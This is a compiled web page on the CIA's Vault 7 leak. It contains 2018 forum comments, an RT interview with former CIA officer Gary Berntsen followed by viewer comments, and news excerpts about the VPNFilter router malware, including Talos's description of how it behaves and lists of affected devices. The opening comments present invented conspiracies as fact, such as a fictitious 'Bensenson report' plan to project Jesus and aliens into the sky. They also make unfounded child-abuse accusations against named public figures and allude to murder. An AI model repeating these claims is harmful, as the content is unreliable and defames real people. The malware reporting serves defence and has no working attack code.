These false fingerprint tactics were all over the trump accusations which started the whole Russia Russia Russia ordeal. And the Russia ordeal was conceptualized in a paid report to Podesta by the Bensenson Group called the Salvage Program when it was appearant that Trump could possible win and the DNC needed ideas on how to throw the voters off at the polls. Russia is coming /Red dawn was #1 or #2 on the list of 7 recommended ploys. The final one was crazy.. If Trump appeared to win the election, imagery of Jesus and an Alien Invasion was to be projected into the skies to cause mass panic and create a demand for free zanex to be handed out to the panic stricken.

Don't forget Black Lives Matters. That was idea #4 of this Bensenson report, to create civil unrest and a race war. Notice how BLM and Antifa manically disappeared after Nov 4. All a ploy by the Dems & the deep state to remain in control of the countrys power.

Back to the topic at hand. Its a wonder he didn't get Seth Riched. Too many porn servers and we will begin to question the legitimacy. Oh wait...

You won't find any kiddie porn on Hillary's or DeNiros laptop. Oh its there. You just will never ever hear about it.

cankles' server -> holdbuysell Mon, 06/18/2018 - 22:57 Permalink

The Vault 7 release - a series of 24 documents which began to publish on March 7, 2017 - reveal that the CIA had a wide variety of tools to use against adversaries, including the ability to "spoof" its malware to appear as though it was created by a foreign intelligence agency ....

It probably can spoof child porn as well.

Is he charged with copyright infringement for pirating child porn?

BGO Mon, 06/18/2018 - 22:43 Permalink

The intel community sure has a knack for sussing out purveyors of child pornography. It's probably just a coincidence govt agencies and child pornography are inextricably linked.

Never One Roach -> BGO Mon, 06/18/2018 - 22:44 Permalink

Sounds like he may be a friend of Uncle Joe Biden whom we know is "very, very friendly" with the children.

NotBuyingIt -> BGO Mon, 06/18/2018 - 23:09 Permalink

It's very easy for a criminal spook to plant child porn on some poor slob's machine - especially when they want to keep him on the hook to sink his ass for something bigger in the future. Who knows... this guy may have done some shit but I'm willing to bet he was entirely targeted by these IC assholes. Facing 135 years in prison... yet that baggy ass cunt Hillary walks free...

DoctorFix -> BGO Mon, 06/18/2018 - 23:18 Permalink

Funny how they always seem to have a "sting" operation in progress when there's anyone the DC rats want to destroy but strangely, or not, silent as the grave when one of the special people are fingered.

MadHatt Mon, 06/18/2018 - 22:43 Permalink

Transportation of Child Pornography, 18 U.S.C. § 2252A(a)(1)

Uhh... what? He stole CIA child porn?

navy62802 -> MadHatt Mon, 06/18/2018 - 23:30 Permalink

Nah ... that's the shit they planted on him for an excuse to make an arrest.

MadHatt -> navy62802 Tue, 06/19/2018 - 00:29 Permalink

If he stole all their hacking apps, wouldn't that be enough to arrest him?

Never One Roach Mon, 06/18/2018 - 22:44 Permalink

That list of federal crimes is almost as long as Comey's list of Hillary Clinton's federal crimes.

_triplesix_ Mon, 06/18/2018 - 22:46 Permalink

Of all these things the C_A can do, it doesn't take a brain surgeon to realize that planting CP on a computer of someone you don't like would be a piece of cake, comparatively speaking.

_triplesix_ Mon, 06/18/2018 - 22:46 Permalink

Of all these things the C_A can do, it doesn't take a brain surgeon to realize that planting CP on a computer of someone you don't like would be a piece of cake, comparatively speaking.

Giant Meteor -> _triplesix_ Mon, 06/18/2018 - 22:51 Permalink

It probably comes standard now buried within systems, like a sleeper cell. Just waiting for the right infraction and trigger to be pulled ..

PigMan Mon, 06/18/2018 - 22:50 Permalink

Did he also leak that the CIA's favorite tactic is to plant kiddie porn on their targets computer?

ConnectingTheDots Mon, 06/18/2018 - 22:56 Permalink

The alphabet agencies would never hack someone's computer.

The alphabet agencies would never spy on US citizens (at least not wittingly)

The alphabet agencies would never plant physical evidence.

The alphabet agencies would never lie under oath.

The alphabet agencies would never have an agenda.

The alphabet agencies would never provide the media with false information.

/s

Chupacabra-322 Mon, 06/18/2018 - 23:14 Permalink

The "Spoofing" or Digital Finger Print & Parallel Construction tools that can be used against Governments, Individuals, enemies & adversaries are Chilling.

The CIA can not only hack into anything -- they can download any "evidence" they want onto your phone or computer. Child pornography, national secrets, you name it. Then they can blackmail you, threatening prosecution for whatever crap they have planted, then "found" on your computer. They can also "spoof" the source of such downloads -- for instance, if they want to "prove" that something on your computer (or Donald Trump's computer) came from a "Russian source" -- they can spoof the IP address of a Russian source.

The take-away: no digital evidence the CIA or NSA produces on any subject whatsoever can be trusted. No digital evidence should be acceptable in any case where the government has an interest, because they have the complete ability to fabricate and implant any evidence on any iphone or computer. And worse: they have intentionally created these digital vulnerabilities and pushed them onto the whole world via Microsoft and Google. Government has long been at war with liberty, claiming that we need to give up liberty to be secure. Now we learn that they have been deliberately sabotaging our security, in order to augment their own power. Time to shut down the CIA and all the other spy agencies. They're not keeping us free OR secure, and they're doing it deliberately. Their main function nowadays seems to be lying us into wars against countries that never attacked us, and had no plans to do so.

The Echelon Computer System Catch Everything

The Flagging goes to Notify the Appropriate Alphabet,,,...Key Words Phrases...Algorithms,...It all gets sucked up and chewed on and spat out to the surmised computed correct departments...That simple.

Effective immediately defund, Eliminate & Supeona it's Agents, Officials & Dept. Heads in regard to the Mass Surveillance, Global Espionage Spying network & monitoring of a President Elect by aforementioned Agencies & former President Obama, AG Lynch & DIA James Clapper, CIA John Breanan.

#SethRich

#Vault7

#UMBRAGE

ZIRPdiggler -> Chupacabra-322 Tue, 06/19/2018 - 00:29 Permalink

Since 911, they've been "protecting" the shit out of us. "protecting" away every last fiber of liberty. Was watching some fact-based media about the CIA's failed plan to install Yeltsin's successor via a Wallstreet banking cartel bet (see, LTCM implosion). The ultimate objectives were to rape and loot post-Soviet Russian resources and enforce regime change. It's such a tired playbook at this point. Who DOESNT know about this sort of affront? Apparently even nobel prize economists cant prevent a nation from failing lol. The ultimate in vanity; our gubmint and its' shadow controllers.

moobra Mon, 06/18/2018 - 23:45 Permalink

This is because people who are smart enough to write walware for the CIA send messages in the clear about child porn and are too dumb to encrypt images with a key that would take the lifetime of the universe to break.

Next his mother will be found to have a tax problem and his brother's credit rating zeroed out.

Meanwhile Comey will be found to have been "careless".

ZIRPdiggler Tue, 06/19/2018 - 00:05 Permalink

Yeah I don't believe for a second that this guy had anything to do with child porn. Not like Obama and his hotdogs or Clintons at pedo island, or how bout uncle pervie podesta? go after them, goons and spooks. They (intelligence agencies) falsely accuse people of exactly what they are ass-deep in. loses credibility with me when the CIA clowns or NSA fuck ups accuse anyone of child porn; especially one of their former employees who is 'disgruntled'. LOL. another spook railroad job done on a whistleblower. fuck the CIA and all 17 alphabet agencies who spy on us 24/7. Just ask, if you want to snoop on me. I may even tell you what I'm up to because I have nothing that I would hide since, I don't give a shit about you or whether you approve of what I am doing.

AGuy -> ZIRPdiggler Tue, 06/19/2018 - 00:36 Permalink

"Yeah I don't believe for a second that this guy had anything to do with child porn."

Speculation by my part: He was running a Tor server, and the porn originated from other Tor users. If that is the case ( it would be easy for law enforcement to just assume it was his) law enforcement enjoys a quick and easy case.

rgraf Tue, 06/19/2018 - 00:05 Permalink

They shouldn't be spying, and they shouldn't keep any secrets from the populace. If they weren't doing anything wrong, they have nothing to hide.

ZIRPdiggler -> rgraf Tue, 06/19/2018 - 00:09 Permalink

It really doesn't matter if someone wants to hide. That is their right. Only Nazi's like our spy agencies would use the old Gestapo line, "If you have nothing to hide then you have nothing to worry about. Or better yet, you should let me turn your life upside down if you have nothing to hide. " Bullshit! It's none of their fucking business. How bout that? Spooks and secret clowns CAN and DO frame anybody for whatever or murder whomever they wish. So why WOULDNT people be afraid when government goons start sticking their big snouts into their lives??? They can ruin your life for the sake of convenience. Zee Furor is not pleased with your attitude, comrade.

Blue Steel 309 Tue, 06/19/2018 - 00:53 Permalink

Vault 7 proves that most digital evidence should be inadmissible in court, yet I don't see anyone publishing articles about this problem.

[Jun 02, 2018] Obama used NSA FBI to spy on Trump veteran CIA officer

Notable quotes:
"... Let me just say this: the President used the word "wiretapping" but I think it was very clear to us that have been in the intelligence business, that this was a synonym for "surveillance". ..."
"... When I was in senior position in CIA's counterterrorism center, I had a deputy who was an FBI officer. An office in FBI HQ down in Washington had an FBI lead with a CIA deputy. There's a lot more cooperation than one would think. There are individuals that do assignments in each other's organisations to help foster levels of cooperation. I had members of NSA in my staff when I was at CIA, members of diplomatic security, members of Alcohol, Tobacco and Firearms, and it was run like a task force, so, there's a lot more cooperation than the media presents, they always think that there are these huge major battles between the organisations and that's rarely true. ..."
"... John Brennan is acting more like a political operative than a former director of CIA. ..."
Mar 20, 2017 | www.youtube.com

The mighty CIA has fallen victim to a major breach, with WikiLeaks revealing the true scope of the Agency's ability for cyber-espionage. Its tools seem to be aimed at ordinary citizens – your phone, your car, your TV, even your fridge can become an instrument of surveillance in the hands of the CIA. How does the CIA use these tools, and why do they need them in the first place?

And as WikiLeaks promises even more revelations, how is all of this going to shape the already tense relationship between new president and the intelligence community?

A man who has spent over two decades in the CIA's clandestine service – Gary Berntsen is on SophieCo.

Follow @SophieCo_RT

FULL TRANSCRIPT: https://www.rt.com/shows/sophieco/381...

Sophie Shevardnadze: Gary Berntsen, former CIA official, welcome to the show, great to have you with us. Now, Vault 7, a major batch of CIA docs revealed by Wikileaks uncovers the agency's cyber tools. We're talking about world's most powerful intelligence agency - how exactly did the CIA lose control of its arsenal of hacking weapons?

Gary Berntsen: First off, I'd like to say that the world has changed a lot in the last several decades, and people are communicating in many different ways and intelligence services, whether they be American or Russian, are covering these communications and their coverage of those communications has evolved. Without commenting on the specific validity of those tools, it was clear that the CIA was surely using contractors to be involved in this process, not just staff officers, and that individuals decided that they had problems with U.S. policy, and have leaked these things to Wikileaks. This is a large problem, for the U.S. community, but just as the U.S. is having problems, the Russia face similar problems. Just this week you had multiple members of the FSB charged with hacking as well, and they have been charged by the U.S. government. So both services who are competitors, face challenges as we've entered a new era of mass communications.

SS: So like you're saying, the leaker or leakers of the CIA docs is presumably a CIA contractor - should the agency be spending more effort on vetting its own officers? Is the process rigorous enough?

GB: Clearly. Look There have been individuals since the dawn of history. Espionage is the second oldest occupation, have conducted spying and espionage operations, and there have been people who have turned against their own side and worked for competitors and worked for those opposing the country or the group that they're working with. It's been a problem from the beginning, and it continues to be a problem, and the U.S. clearly is going to have to do a much better job at vetting those individuals who are given security clearances, without a doubt.

SS: The CIA studied the flaws in the software of devices like iPhones, Androids, Smart TVs, apps like Whatsapp that left them exposed to hacking, but didn't care about patching those up - so, in essence the agency chose to leave Americans vulnerable to cyberattacks, rather than protect them?

GB: I think you have to understand, in this world that we're operating and the number one target of our intelligence community are terrorists. Since the attacks of 9\11, 16 years ago, the obsession of the American intelligence community is to identify those planning terrorist attacks, collecting information on them and being able to defeat them. These individuals are using all these means of communication. I have spoken with many security services around the world, since my retirement back in 2005-2006, a lot of them have had problems covering the communications of somebody's very devices and programs that you've talked about - whether they be narcotraffickers or salafist jihadists, they are all piggybacking off of commercial communications. Therefore the need for modern intelligence services to sort of provide coverage of all means of communications. And there's a price that you pay for that.

SS: One of the most disturbing parts of the leaks is the "Weeping Angel" program - CIA hacking into Samsung Smart TVs to record what's going on even when the TV appears to be turned off. Why are the CIA's tools designed to penetrate devices used by ordinary Western citizens at home?

GB: Look, I wouldn't say it has anything to do with Western homes, because the CIA doesn't do technical operations against American citizens - that's prohibited by the law. If the CIA does anything in the U.S., it does it side-by-side with the FBI, and it does it according to FISA - the Foreign Intelligence and Surveillance Act laws. It's gotta go to the judge to do those things. Those tools are used primarily against the individuals and terrorists that are targeting the U.S. or other foreign entities that we see as a significant threat to the U.S. national security, which is the normal functioning of any intelligence service.

SS: Just like you say, the CIA insists it never uses its investigative tools on American citizens in the US, but, we're wondering, exactly how many terrorist camps in the Middle East have Samsung Smart TVs to watch their favorite shows on? Does it seem like the CIA lost its direction?

GB: Plenty of them.

SS: Plenty?...

GB: I've travelled in the Middle East, Samsungs are sold everywhere. Sophie, Samsung TVs are sold all over the world. I've spent a lot of time in the Middle East, I've seen them in Afghanistan, I've seen them everywhere. So, any kind of devices that you can imagine, people are using everywhere. We're in a global economy now.

SS: The CIA has tools to hack iPhones - but they make up only around 15 % of the world's smartphone market. IPhones are not popular among terrorists, but they are among business and political elites - so are they the real target here?

GB: No. The CIA in relative terms to the size of the world is a small organisation. It is an organisation that has roughly 20 or more thousand people - it's not that large in terms of covering a planet with 7 billion people. We have significant threats to the U.S. and to the Western world. We live in an age of super-terrorism, we live in an age when individuals, small groups of people, can leverage technology at a lethal effect. The greatest threats to this planet are not just nuclear, they are bio. The U.S. needs to have as many tools as possible to defend itself against these threats, as does Russia want to have similar types of tools to defend itself. You too, Russian people have suffered from a number of terrible terrorist acts.

SS: Wikileaks suggest the CIA copied the hacking habits of other nations to create a fake electronic trace - why would the CIA need that?

GB: The CIA, as any intelligence service, would look to conduct coverage in the most unobtrusive fashion as possible. It is going to do its operations so that they can collect and collect again and again against terrorist organisations, where and whenever it can, because sometimes threats are not just static, they are continuous.

SS: You know this better, so enlighten me: does the he CIA have the authorisation to create the surveillance tools it had in the first place? Who gives it such authorisation?

GB: The CIA was created in 1947 by the National Security Act of the U.S. and does two different things - it does FI (foreign intelligence) collection and it does CA - covert action. Its rules for collection of intelligence were enshrined in the law that created it, the CIA Act 110, in 1949, but the covert action part of this, where it does active measures, when it gets involved in things - all of those are covered by law. The Presidential finding had to be written, it had to be presented to the President. The President's signs off on those things. Those things are then briefed to members of Congress, or the House Permanent Subcommittee for Intelligence and the Senate Select Committee for Intelligence. We have a very rigorous process of review of the activities of our intelligence communities in the U.S.

SS: But you're talking about the activities in terms of operations. I'm just asking - does CIA need any authorisation or permission to create the tools it has in its arsenal? Or it can just go ahead

GB: Those tools and the creation of collection tools falls under the same laws that allowed the CIA to be established. And that was the 1949 Intelligence Act. And also, subsequently, the laws in 1975. Yes.

SS: So, the CIA programme names are quite colourful, sometimes wacky - "Weeping Angel", "Swamp Monkey", "Brutal Kangaroo" - is there a point to these, is there any logic, or are they completely random? I always wondered...

GB: There's absolutely no point to that, and it's random.

SS:Okay, so how do you come up with those names? Who like, one says: "Monkey" and another one says: "Kangaroo"?...

GB: I'm sure they are computer-generated.

SS: Trump accused Obama of wiretapping him during the campaign Could the CIA have actually spied on the president? It seems like the agency doesn't have the best relationship with Donald Trump - how far can they go?

GB: Let me just say this: the President used the word "wiretapping" but I think it was very clear to us that have been in the intelligence business, that this was a synonym for "surveillance". Because most people are on cellphones, people aren't using landlines anymore, so there's no "wiretapping", okay. These all fall under the Intelligence Surveillance Act, as I stated earlier, this thing existing in the U.S.. It was clear to President Trump and to those in his campaign, after they were elected, and they did a review back that the Obama Administration sought FISA authorisation to do surveillance of the Trump campaign in July and then in October. They were denied in July, they were given approval in October, and in October they did some types of surveillance of the Trump campaign. This is why the President, of course, tweeted, that he had been "wiretapped" - of course "wiretapping" being a synonym for the surveillance against his campaign, which was never heard of in the U.S. political history that I can remember, I can't recall any way of this being done. It's an outrage, and at the same time, Congressional hearings are going to be held and they are going to review all of these things, and they are going to find out exactly what happened and what was done. It's unclear right now, but all we do know - and it has been broken in the media that there were two efforts, and at the second one, the authorisation was given. That would never have been done by the CIA, because they don't do that sort of coverage in the U.S.. That would either be the FBI or the NSA, with legal authorities and those authorities the problem that the Trump administration had is they believed that the information from these things was distributed incorrectly. Any time an American - and this is according to the U.S. law - any time an American is on the wire in the U.S., their names got to be minimized from this and it clearly wasn't done and the Trump administration was put in a bad light because of this.

SS: If what you're saying is true, how does that fall under foreign intelligence? Is that more of the FBI-NSA expertise?

GB: It was FBI and NSA - it was clearly the FBI and the NSA that were involved, it would never have been the CIA doing that, they don't listen to telephones in the U.S., they read the product of other agencies that would provide those things, but clearly, there were individuals on those phone calls that they believed were foreign and were targeting those with potential communications with the Trump campaign. Let's be clear here - General Clapper, the DNI for President Obama, stated before he left office, that there was no, I repeat, no evidence of collusion between the Trump campaign and Russia. This has been something that has been dragged out again, and again, and again, by the media. This is a continuing drumbeat of the mainstream, left-wing media of the U.S., to paint the President in the poorest light, to attempt to discredit Donald Trump.

SS: With the intelligence agencies bringing down Trump's advisors like Michael Flynn - and you said the people behind that were Obama's loyalists - can we talk about the intelligence agencies being too independent from the White House, playing their own politics?

GB: I think part of the problem that we've seen during the handover of power from President Obama to President Trump was that there was a number of holdovers that went from political appointee to career status that had been placed in the NatSec apparatus and certain parts of the intelligence organisations. It is clear that President Trump and his team are determined to remove those people to make sure that there's a continuity of purpose and people aren't leaking information that would put the Administration into a negative light. That's the goal of the administration, to conduct itself consistent with the goals of securing the country from terrorism and other potential threats - whether they be counter-narcotics, or intelligence agencies trying to breach our you know, the information that we hold secure.

SS: Here's a bit of conspiracy theories - could it be that the domestic surveillance agencies like the NSA or the FBI orchestrated the Vault 7 leaks - to damage CIA, stop it from infringing on their turf?

GB :I really don't think so and that is conspiracy thinking. You have to understand something, in the intelligence communities in the U.S., whether it be the CIA and FBI, we've done a lot of cross-fertilizations. When I was in senior position in CIA's counterterrorism center, I had a deputy who was an FBI officer. An office in FBI HQ down in Washington had an FBI lead with a CIA deputy. There's a lot more cooperation than one would think. There are individuals that do assignments in each other's organisations to help foster levels of cooperation. I had members of NSA in my staff when I was at CIA, members of diplomatic security, members of Alcohol, Tobacco and Firearms, and it was run like a task force, so, there's a lot more cooperation than the media presents, they always think that there are these huge major battles between the organisations and that's rarely true.

SS: Generally speaking - is there rivalry between American intel agencies at all? Competition for resources, maybe?

GB: I think, sometimes, between the Bureau and the CIA - the CIA is the dominant agency abroad, and the FBI is the dominant agency in the U.S. What they do abroad, they frequently have to get cleared by us, what we do domestically, we have to get cleared by them, and sometimes there's some friction, but usually, we're able to work this out. It makes for great news, the CIA fighting FBI, but the reality is that there's a lot more cooperation than confrontation. We are all in the business of trying to secure the American homeland and American interests globally.

SS: I'm still thinking a lot about the whole point of having this hacking arsenal for the CIA since you talk on their behalf - the possibility to hack phones, computers, TVs and cars - if the actual terrorist attacks on US soil, like San Bernardino, Orlando are still missed?

GB: Look. There are hundreds of individuals, if not thousands, planning efforts against the U.S. at any time. It can be many-many things. And the U.S. security services, there's the CIA, the FBI, NSA - block many-many of these things, but it is impossible to stop them all. Remember, this is an open society here, in America, with 320 million people, here. We try to foster open economic system, we allow more immigration to America than all countries in the world combined. This is a great political experiment here, but it's also very difficult to police. There are times that the U.S. security services are going to fail. It's inevitable. We just have to try the best we can, do the best job that we can, while protecting the values that attract so many people to the U.S.

SS:The former CIA director John Brennan is saying Trump's order to temporarily ban travel from some Muslim states is not going to help fight terrorism in 'any significant way'. And the countries where the terrorists have previously come from - like Saudi Arabia, or Afghanistan, it's true - aren't on the list. So does he maybe have a point?

GB: John Brennan is acting more like a political operative than a former director of CIA. The countries that Mr. Trump had banned initially, or at least had put a partial, sort of a delay - where states like Somalia, Libya, the Sudan, Iran - places where we couldn't trust local vetting. Remember something, when someone immigrates to the U.S., we have what's called an "immigration packet": they may have to get a chest X-ray to make sure they don't bring any diseases with them, they have to have background check on any place they've ever lived, and in most of these places there are no security forces to do background checks on people that came from Damascus, because parts of Damascus are totally destroyed - there's been warfare. It is actually a very reasonable thing for President Trump to ask for delay in these areas. Look, the Crown-Prince, the Deputy Crown-Prince of Saudi Arabia was just in the United States and met with Donald Trump, and he said he didn't believe it was a "ban on Muslims". This was not a "ban on Muslims", it was an effort to slow down and to create more opportunity to vet those individuals coming from states where there's a preponderance of terrorist organisations operating. A reasonable step by President Trump, something he promised during the campaign, something he's fulfilling. But again, I repeat - America allows more immigration into the U.S., than all countries combined. So, we really don't need to be lectured on who we let in and who we don't let in.

SS: But I still wonder if the Crown-Prince would've had the same comment had Saudi Arabia been on that ban list. Anyways, Michael Hayden, ex-CIA

GB: Wait a second, Sophie - the Saudis have a reasonable form to police their society, and they provide accurate police checks. If they didn't create accurate police checks, we would've given the delay to them as well.

SS: Ok, I got your point. Now, Michael Hayden, ex-CIA and NSA chief, pointed out that the US intelligence enlists agents in the Muslim world with the promise of eventual emigration to America - is Trump's travel ban order going to hurt American intelligence gathering efforts in the Middle East?

GB: No, the question here - there were individuals that worked as translators for us in Afghanistan and Iraq and serving in such roles as translators, they were promised the ability to immigrate to the United States. Unfortunately, some of them were blocked in the first ban that was put down, because individuals who wrote that, didn't consider that. That has been considered in the re-write, that the Trump administration had submitted, which is now being attacked by a judge in Hawaii, and so it was taken into consideration, but the objective here was to help those that helped U.S. forces on the ground, especially those who were translators, in ground combat operations, where they risked their lives alongside American soldiers.

SS: You worked in Afghanistan - you were close to capturing Bin Laden back in 2001 - what kind of spying tools are actually used on the ground by the CIA to catch terrorists?

GB: The CIA as does any intelligence service in the world, is a human business. It's a business where we work with local security forces to strengthen their police and intelligence forces, we attempt to leverage them, we have our own people on the ground that speak the language, we're trying to help build transportation there. There's no "secret sauce" here. There's no super-technology that changes the country's ability to conduct intelligence collections or operations. In Afghanistan the greatest thing that the U.S. has is broad support and assistance to Afghan men and women across the country. We liberated half of the population, and for women were providing education, and when the people see what we were doing: trying to build schools, providing USAID projects - all of these things - this makes the population willing to work with and support the United States. Frequently, members of the insurgence groups will see this and sometimes they do actually cross the lines and cooperate with us. So, it's a full range of American political power, whether it's hard or soft, that is the strength of the American intelligence services - because people in the world actually believe - and correctly so - that American more than generally a force of good in the world.

SS: Gary, thank you so much for this interesting interview and insight into the world of the CIA. We've been talking to Gary Berntsen, former top CIA officer, veteran of the agency, talking about the politics of American intelligence in the Trump era. That's it for this edition of SophieCo, I will see you next time.

GreenPizza:

Just thinking here in the light of how things are unfolding with the CIA I am wondering since Federal crimes are committed can the FBI investigate the CIA acting as America Federal Law Enforcement.

RedBlowDryer -> GreenPin

I think the US intelligent agencies are harming their country more than any enemy of the US.

CyanGrapes

There is a reason why JFK wanted to dismantle the CIA. This guy is lying.

PurpleWieghts

CIA needs hacking tools to make it look like it was carried out by another state simply for plausible deniability.

Carl Zaisser

a "force for good in the world"?...sounds like the American white hat-black hat myth...read Naomi Klein's "The Shock Doctrine: The Rise of Disaster Capitalism". This is a detailed litany of America's various kinds of interventions in multiple countries that cold hardly be described as "a force for good in the world"...a force for "America's values" (read with ironically), perhaps

Carl Zaisser

WHO is responsible for the outbreak of chaotic warfare in Libya and Syria?

Should we trust the Saudi vetting services...think of who the September 11 bombers were? Was there another reason they were not on Trump's banned countries list? Too big to mess with, i.e., oil and weapons sales?

GreenPin

Amazing how they justify their destructive behaviour in a way as they are serving America people and doing good around the wold. You can sugar count your crimes against humanity as much as you can, but the reality of today' human misery speaks for itself.

waterbearer

since the United States was founded in 1776, she has been at war during 214 out of her 235 calendar years of existence

XXX

interesting, but begs the question "Can we really trust what this guy tells us?" If not, what parts can we trust, and what parts can't we?

XXX

You'd have to deconstruct his talking points and I don't know how that is done. Intelligence probably knows how to do that. I noticed he was becoming more zealous on hegemony and exceptionalism as the interview neared the end.

I agree. Bernsten is almost like-ably energetic, but he is, in the end, an uncompromising warrior of the empire.

XXX

if Trump is to be controlled--they gotta have some dirt--or threat against his family --it's how they operate---

XXX

Mr. Berntsen left out the very important NSC10/2 legislation, which gave the CIA free reign with deniability as the cover. This needs to be repealed. With this legislation, the CIA answers to no one, and goes around the world wrecking havoc with the governments and people where they like. We will never have peace until that legislation is repealed.

XXX

This is why interesting books to read about the history of the CIA.

XXX

I applaud former CIA and FBI Gary Bernstein for speaking out on the most powerful intelligence networks on the planet regarding their surveillance activities. Every nation needs intelligence to safeguard but if we go beyond the call of duty and get exposed .this leaves Pres Trump and his Adm with no option but to consider corrective measures with a visit to Langley etc.. Here again the failures of Liberalism are coming up in the wash for cleaning up.

XXX

Liberalism has not been running the country for the last 54 years. We have been under a coup government and just got used to it.

[May 28, 2018] Stealthy, Destructive Malware Infects Half a Million Routers WIRED by Andy Greenberg

May 28, 2018 | www.wired.com

Home routers have become the rats to hackers' bubonic plague: an easily infected, untreated, and ubiquitous population in which dangerous digital attacks can spread. Now security researchers are warning that one group of sophisticated hackers has amassed a collection of malware-infected routers that could be used as a powerful tool to spread havoc across the internet, or simply triggered to implode networks across the globe.

On Wednesday, Cisco's Talos security division warned of a new breed of malware it calls VPNFilter, which it says has infected at least half a million home and small business routers, including those sold by Netgear, TP-Link, Linksys, MicroTik, and QNAP network storage devices. Talos believes that the versatile code is designed to serve as a multipurpose spy tool, and also creates a network of hijacked routers that serve as unwitting VPNs, potentially hiding the attackers' origin as they carry out other malicious activities. Perhaps most disturbingly, they note the tool also has a destructive feature that would allow the hackers behind it to immediately corrupt the firmware of the entire collection of hacked routers, essentially bricking them.

"This actor has half a million nodes spread out over the world and each one can be used to control completely different networks if they want," says Craig Williams, who leads Talos' security research team. "It's basically an espionage machine that can be retooled for anything they want."

'It's basically an espionage machine that can be retooled for anything they want.'

Craig Williams, lead for Talos' security research team

Exactly how VPNFilter infects its targets isn't yet clear. But home routers are notoriously prone to vulnerabilities that can allow remote hackers to take them over, and rarely receive software updates. "This is a set of devices that's getting targeted more and more over the years," says Michael Daniel, the head of the Cyber Threat Alliance, a security industry group that's working with Cisco's Talos to alert the industry to the VPNFilter threat and hasten its removal. "They sit outside firewalls, they don't have native antivirus, they're hard to patch."

Talos writes in a detailed blog post that the VPNFilter malware is capable of siphoning off any data that passes through the network devices it infects, and appears specifically designed to monitor credentials entered into websites. Another, largely unexplained spying feature of the tool seems to watch for communications over the ModBUS SCADA protocol that's used for controlling automated equipment and internet-of-things devices.

But Talos' Williams also points out that the mass of hacked routers can also function as a collection of proxies for other activities the hackers might engage in -- from penetrating other targets to distributed denial-of-service attacks designed to knock websites offline. Hence the VPN in its name. "We assess with high confidence that this malware is used to create an expansive, hard-to-attribute infrastructure that can be used to serve multiple operational needs of the threat actor," Talos' blog post reads.

[May 27, 2018] F.B.I.'s Urgent Request Reboot Your Router to Stop Russia-Linked Malware

This kind of threat is often exaggerated by security companies so it should not be taken at face value. But truth be told home routers represent a dismal picture and are easily compromised. The dismal state of security of home router come to attention during Hillary bathroom email server saga.
VPNfilter attacks only selected models from 4 manufactures only(but some models affected are really popular): Linksys ,MikroTek, NETGEAR , TP-LINK . CISCO, Juniper, Zixel and other manifactures are not affected. The list of devices affected is available (probably not complete).
Upgrade of firmware is a good idea in any case. Same is true about disabling the remote management.
May 27, 2018 | www.nytimes.com

The F.B.I. has several recommendations for any owner of a small office or home office router. The simplest thing to do is reboot the device, which will temporarily disrupt the malware if it is present. Users are also advised to upgrade the devices' firmware and to select a new secure password. If any remote-management settings are in place, the F.B.I. suggests disabling them.

Advertisement

An analysis by Talos , the threat intelligence division for the tech giant Cisco, estimated that at least 500,000 routers in at least 54 countries had been infected by the malware, which the F.B.I. and cybersecurity researchers are calling VPNFilter. Among the affected networking equipment it found during its research were devices from manufacturers including Linksys, MikroTik, Netgear and TP-Link.

To disrupt the Sofacy network, the Justice Department sought and received permission to seize the web domain toknowall.com, which it said was a critical part of the malware's "command-and-control infrastructure." Now that the domain is under F.B.I. control, any attempts by the malware to reinfect a compromised router will be bounced to an F.B.I. server that can record the I.P. address of the affected device.

[May 27, 2018] VPNFilter is a malware timebomb lurking on your router? by Paul Ducklin

May 27, 2018 | nakedsecurity.sophos.com

Don't delay – do it today!

[May 27, 2018] Cisco's Talos Intelligence Group Blog New VPNFilter malware targets at least 500K networking devices worldwide

May 27, 2018 | blog.talosintelligence.com

We recommend that:

Due to the potential for destructive action by the threat actor, we recommend out of an abundance of caution that these actions be taken for all SOHO or NAS devices, whether or not they are known to be affected by this threat.

... ... ...

The stage 2 malware first sets up the working environment by creating a modules folder (/var/run/vpnfilterm) and a working directory (/var/run/vpnfilterw). Afterward, it will run in a loop, where it first reaches out to a C2 server, and then executes commands retrieved from the C2. The command names are encrypted with the same broken RC4 function as in stage 1. Fortunately, older versions of x86 stage 2 sample were very verbose, and debug printed all the steps it performed. Newer versions of the x86 stage 2 did not contain the debug prints, nor did the MIPS sample.

The x86 sample can perform the following operations:

The MIPS sample has the following additional operations:

Until the Tor module is installed, stage 2 will use one or more IPs stored in its configuration as SOCKS5 proxies to Tor and attempt to communicate with a control panel also found in its configuration. Like in stage 1, the communication between the malware and the proxy will connect over a verified SSL connection. When the Tor module is installed, it will connect to .onion domains through the local SOCKS5 proxy provided by the module over plain HTTP instead. We used a fake SOCKS5 proxy, which redirects all traffic to INetSim for analysis.

[May 27, 2018] VPNFilter: What we know about the malware infecting routers around the globe by Ellen Tannam

May 25, 2018 | www.siliconrepublic.com

A multistage malware variant, VPNFilter consists of three separate steps, with the second stage allowing for communication over Tor.

Symantec published a list of the identified targeted devices, which include numerous models of consumer routers:

[May 27, 2018] Talos Reports That Router Based Malware, VPNFilter, Has Over 500,000 Impacted Devices - Agile IT

May 27, 2018 | www.agileit.com

The malware is modular, meaning that additional capabilities can be added to provide new functionalities, but also for functions to be removed, hence masking the full capabilities of the software. The VPNFilter Modules Talos has identified so far are: Stage 1

Stage 2: Stage 3:

VPNFilter's capabilities make it particularly dangerous, as it is more of a distributed toolkit than a single point attack.

Response

Talos has technical response details available on its blog , including Snort signatures, known Command and Control IP addresses to block and configuration settings for Stealthwatch.

Devices with known vulnerabilities

LINKSYS DEVICES:

E1200
E2500
WRVS4400N

MIKROTIK CLOUD CORE ROUTERS:

1016
1036
1072

NETGEAR DEVICES:

DGN2200
R6400
R7000
R8000
WNR1000
WNR2000

QNAP DEVICES:
TS251
TS439 Pro

Other QNAP NAS devices running QTS software

TP-LINK DEVICES:

R600VPN

[May 15, 2018] Suspect Identified in C.I.A. Leak Was Charged, but Not for the Breach - The New York Times

May 15, 2018 | www.nytimes.com

... ... ...

[Vault 7] was the largest loss of classified documents in the agency's history and a huge embarrassment for C.I.A. officials.

Now, the prime suspect in the breach has been identified: a 29-year-old former C.I.A. software engineer who had designed malware used to break into the computers of terrorism suspects and other targets, The New York Times has learned.

Agents with the Federal Bureau of Investigation searched the Manhattan apartment of the suspect, Joshua A. Schulte, one week after WikiLeaks released the first of the C.I.A. documents in March last year, and then stopped him from flying to Mexico on vacation, taking his passport, according to court records and relatives. The search warrant application said Mr. Schulte was suspected of "distribution of national defense information," and agents told the court they had retrieved "N.S.A. and C.I.A. paperwork" in addition to a computer, tablet, phone and other electronics.

